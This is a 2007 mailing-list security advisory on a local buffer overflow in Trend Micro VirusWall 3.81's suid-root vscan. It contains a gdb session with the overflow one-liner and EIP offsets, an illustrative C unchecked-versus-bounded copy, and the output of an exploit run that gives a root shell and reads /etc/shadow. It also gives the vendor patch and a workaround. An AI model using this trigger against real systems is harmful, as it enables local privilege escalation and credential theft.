Message-Id: <200701252148.30706.sebastian.wolfgarten@gmx.net>
Date: Thu, 25 Jan 2007 21:48:30 +0100
From: Sebastian Wolfgarten <sebastian.wolfgarten@....net>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Buffer overflow in VSAPI library of Trend Micro VirusWall 3.81 for Linux

I - TITLE

Security advisory: Buffer overflow in VSAPI library of Trend Micro VirusWall 
3.81 for Linux

II - SUMMARY

Description: Local buffer overflow vulnerability in VSAPI library allows 
arbitrary code execution and leads to privilege escalation

Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com), 
http://www.devtarget.org

Date: January 25th, 2007

Severity: Medium

References: http://www.devtarget.org/trendmicro-advisory-01-2007.txt

III - OVERVIEW

The Trend Micro VirusWall is a software solution to block viruses, spyware, 
spam and various other kinds of threats at the Internet gateway. More 
information about the product can be found online at 
http://www.trendmicro.com/en/products/gateway/isvw/evaluate/overview.htm.

IV - DETAILS

The product "InterScan VirusWall 3.81 for Linux" ships a legacy library 
called "libvsapi.so" which contains a memory corruption vulnerability. One 
of the applications that apparently uses this library is called "vscan", 
which is set suid root by default. It was discovered that this supporting 
program is prone to a classic buffer overflow when a particularly long 
command-line argument is passed and the application uses the flawed library 
to copy that data into a fixed-size buffer. On a Debian 3.1 test system, for 
instance, an attacker needs to supply 1116 + 4 bytes to completely overwrite 
the EIP register and thus execute arbitrary code with root privileges:

# /opt/trend/ISBASE/IScan.BASE/vscan -v
Virus Scanner v3.1, VSAPI v6.810-1005
Trend Micro Inc. 1996,1997
        Pattern version 684
        Pattern number 56446
No scan target specified!! do nothing.

# gdb /opt/trend/ISBASE/IScan.BASE/vscan
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions. Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details. This GDB was configured as "i386-linux"...(no debugging symbols
found) Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) run `perl -e 'print "A"x1116 . "B"x4'`
Starting program: /opt/trend/ISBASE/IScan.BASE/vscan `perl -e 'print
"A"x1116 . "B"x4'`
(no debugging symbols found)
Virus Scanner v3.1, VSAPI v6.810-1005
Trend Micro Inc. 1996,1997
        Pattern version 684
        Pattern number 56446

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) info registers
eax            0xffffffff       -1
ecx            0x24     36
edx            0x40277560       1076327776
ebx            0xbffffa03       -1073743357
esp            0xbffff818       0xbffff818
ebp            0x41414141       0x41414141
esi            0xbffff838       -1073743816
edi            0x804f008        134541320
eip            0x42424242       0x42424242
eflags         0x287    647
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
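
The unchecked copy the advisory describes and its bounded counterpart, as an 
added example in C that is not code from the advisory, from vscan or from 
libvsapi.so; the 1116-byte buffer size and all function names are assumptions 
chosen to mirror the register dump above, not the library's real layout:

```c
#include <stdio.h>
#include <string.h>

/* Added illustration, not code from the advisory, vscan or libvsapi.so.
 * SCAN_TARGET_MAX is an assumption: the advisory's gdb session shows 1116
 * bytes reaching the saved frame pointer, so that size is used here. */
#define SCAN_TARGET_MAX 1116

/* The pattern the advisory describes: the scan target from argv is copied
 * into a fixed buffer with no length check, so a longer argument overwrites
 * the saved EBP and EIP. Kept only for contrast; nothing below calls it. */
void copy_target_unchecked(char *dst, const char *arg)
{
    strcpy(dst, arg);
}

/* Hardened form: reject any argument that does not fit together with its
 * terminating NUL. Returns 0 and fills dst on success, -1 on rejection. */
int copy_target_checked(char *dst, size_t dstlen, const char *arg)
{
    size_t n = 0;
    while (n < dstlen && arg[n] != '\0')   /* bounded scan, never past dstlen */
        n++;
    if (n >= dstlen)
        return -1;                          /* would overflow or lose the NUL */
    memcpy(dst, arg, n + 1);
    return 0;
}

/* Builds the argument the advisory's gdb session passes ("A" x 1116 then
 * "B" x 4). Returns its length, or -1 if out cannot hold it. */
int build_advisory_argument(char *out, size_t outlen)
{
    const size_t len = 1116 + 4;
    if (outlen < len + 1)
        return -1;
    memset(out, 'A', 1116);
    memset(out + 1116, 'B', 4);
    out[len] = '\0';
    return (int)len;
}

int main(void)
{
    char target[SCAN_TARGET_MAX], arg[SCAN_TARGET_MAX + 8];
    build_advisory_argument(arg, sizeof arg);
    printf("checked copy returned %d\n", copy_target_checked(target, sizeof target, arg));
    return 0;
}
```

With the bounded copy the 1120-byte argument is refused before anything is 
written, whereas the unchecked copy is exactly what lets it reach the saved 
EIP.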

V - ANALYSIS

The severity of this vulnerability is probably "medium" as by default the 
vscan file is only executable by the root user and members of the "iscan" 
group, which is created during the installation of the software:

# ls -la /opt/trend/ISBASE/IScan.BASE/vscan
-r-sr-x---  1 root iscan 24400 2003-12-20 03:53
/opt/trend/ISBASE/IScan.BASE/vscan

However, administrators may have changed the default permissions and thus 
granted all local users the privilege to execute the file. Other 
applications that use this library may be flawed as well (not checked).

VI - EXPLOIT CODE

An exploit for this vulnerability is attached to this email and can also be 
found online at http://www.devtarget.org/tmvwall381v3_exp.c. It was 
successfully tested on Debian Linux 3.1 with kernel 2.6.8 and leads to a 
local privilege escalation:

sebastian@...ian31:~$ ./tmvwall381v3_exp

Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux)
Author: Sebastian Wolfgarten, <sebastian@...fgarten.com>
Date: January 3rd, 2007

Okay, /opt/trend/ISBASE/IScan.BASE/vscan is executable and by the way,
your current user id is 5002.

Executing /opt/trend/ISBASE/IScan.BASE/vscan. Afterwards check your privilege
level with id or whoami!

Virus Scanner v3.1, VSAPI v8.310-1002
Trend Micro Inc. 1996,1997
Pattern number 4.155.00

sh-2.05b# id
uid=5002(sebastian) gid=100(users) euid=0(root) groups=100(users),5001(iscan)

sh-2.05b# cat /etc/shadow

root:***REMOVED***:13372:0:99999:7:::
daemon:*:13372:0:99999:7:::
bin:*:13372:0:99999:7:::
sys:*:13372:0:99999:7:::
sync:*:13372:0:99999:7:::
games:*:13372:0:99999:7:::

[...]

iscan:!:13500:0:99999:7:::
sebastian:***REMOVED***:13500:0:99999:7:::

VII - WORKAROUND/FIX

To address this problem, the vendor has released a patch called "InterScan 
VirusWall 3.81 for Linux Security Patch - VSAPI module" which is available at 
http://www.trendmicro.com/download/product.asp?productid=13&show=patch and 
which will replace the flawed library libvsapi.so with a newer version. Hence 
all users of the VirusWall product are asked to test and install this patch 
as soon as possible. Trend Micro also created a knowledge base article that 
covers the problem (see 
http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034124&id=EN-1034124). 

Furthermore, as a temporary workaround one may also simply remove the suid 
bit from the vscan file and thus render any attack virtually useless by 
executing

# chmod -s /opt/trend/ISBASE/IScan.BASE/vscan

The same holds true for any other (suid root) application that uses this 
library.

VIII - DISCLOSURE TIMELINE

02. January 2007 - Notified security@...ndmicro.com
05. January 2007 - Vulnerability confirmed
21. January 2007 - Release of patch
25. January 2007 - Public disclosure 
